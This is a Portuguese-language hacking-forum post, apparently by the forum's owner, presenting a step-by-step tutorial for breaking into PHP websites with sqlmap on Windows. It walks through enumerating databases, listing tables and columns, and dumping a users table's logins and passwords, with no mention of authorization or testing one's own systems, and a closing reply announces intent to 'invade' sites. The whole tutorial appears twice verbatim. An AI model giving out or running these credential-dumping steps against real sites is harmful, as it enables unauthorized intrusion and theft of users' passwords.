Eae pessoal Aki eo Master sou o dono desse forum e vou amostrar como hackiar um site pelo sqlmap no windows ,Segue o Tutorial Abaixo
Primeiro Baixem O SQLMAP & Python Links : [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Depois Faça Tudo Do Tutorial
Sql-injection (sqlmap)
(OBS: seu sqlmap deve estar no disco local (C:) e seu python ja instalado.)
Comandos:
OBS:ABRA O CMD E QUANDO FOR BAIXAR O SQLMAP QUANDO FOR JOGAR LA NO DISCO LOCAL C RENOMEIE PARA SQLMAP
1° => cd c:\sqlmap
2° => sqlmap.py -u (url do site ja com a extensão php) --dbs
3° => Vamos supor que apareceu algo assim:
* exemplo_1
* exemplo_2
shutting down (é so uma menssagem de que ja acabou)
*infamation_schema (nunca entre neste)
4° => vamos entrar no exemplo_1:
5° => sqlmap.py -u (url do site ja com a extensão php) -D exemplo_1 --tables
6° => Ae apareceu algo assim:
7° => ----------------
| Users |
| Noticias |
|________|
ops... tabela mau feita mas da para entender.
8° vamos abrir as tabelas (no nosso caso Users):
9° => sqlmap.py -u ( url do site ja com a extensão php) -D exemplo_1 -T users --columns
10° => ae aparece assim:
11° => ----------------
| login |
| senha |
| email |
|________|
12° => agora acessaremos o login e a senha:
13° => sqlmap.py -u ( url do site ja com a extensão php) -D exemplo_1 -T users -C login,senha --dump
Primeiro Baixem O SQLMAP & Python Links : [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Depois Faça Tudo Do Tutorial
Sql-injection (sqlmap)
(OBS: seu sqlmap deve estar no disco local (C:) e seu python ja instalado.)
Comandos:
OBS:ABRA O CMD E QUANDO FOR BAIXAR O SQLMAP QUANDO FOR JOGAR LA NO DISCO LOCAL C RENOMEIE PARA SQLMAP
1° => cd c:\sqlmap
2° => sqlmap.py -u (url do site ja com a extensão php) --dbs
3° => Vamos supor que apareceu algo assim:
* exemplo_1
* exemplo_2
shutting down (é so uma menssagem de que ja acabou)
*infamation_schema (nunca entre neste)
4° => vamos entrar no exemplo_1:
5° => sqlmap.py -u (url do site ja com a extensão php) -D exemplo_1 --tables
6° => Ae apareceu algo assim:
7° => ----------------
| Users |
| Noticias |
|________|
ops... tabela mau feita mas da para entender.
8° vamos abrir as tabelas (no nosso caso Users):
9° => sqlmap.py -u ( url do site ja com a extensão php) -D exemplo_1 -T users --columns
10° => ae aparece assim:
11° => ----------------
| login |
| senha |
| email |
|________|
12° => agora acessaremos o login e a senha:
13° => sqlmap.py -u ( url do site ja com a extensão php) -D exemplo_1 -T users -C login,senha --dump
Vlw vou Invadir com sqlMap Agora Boa Dica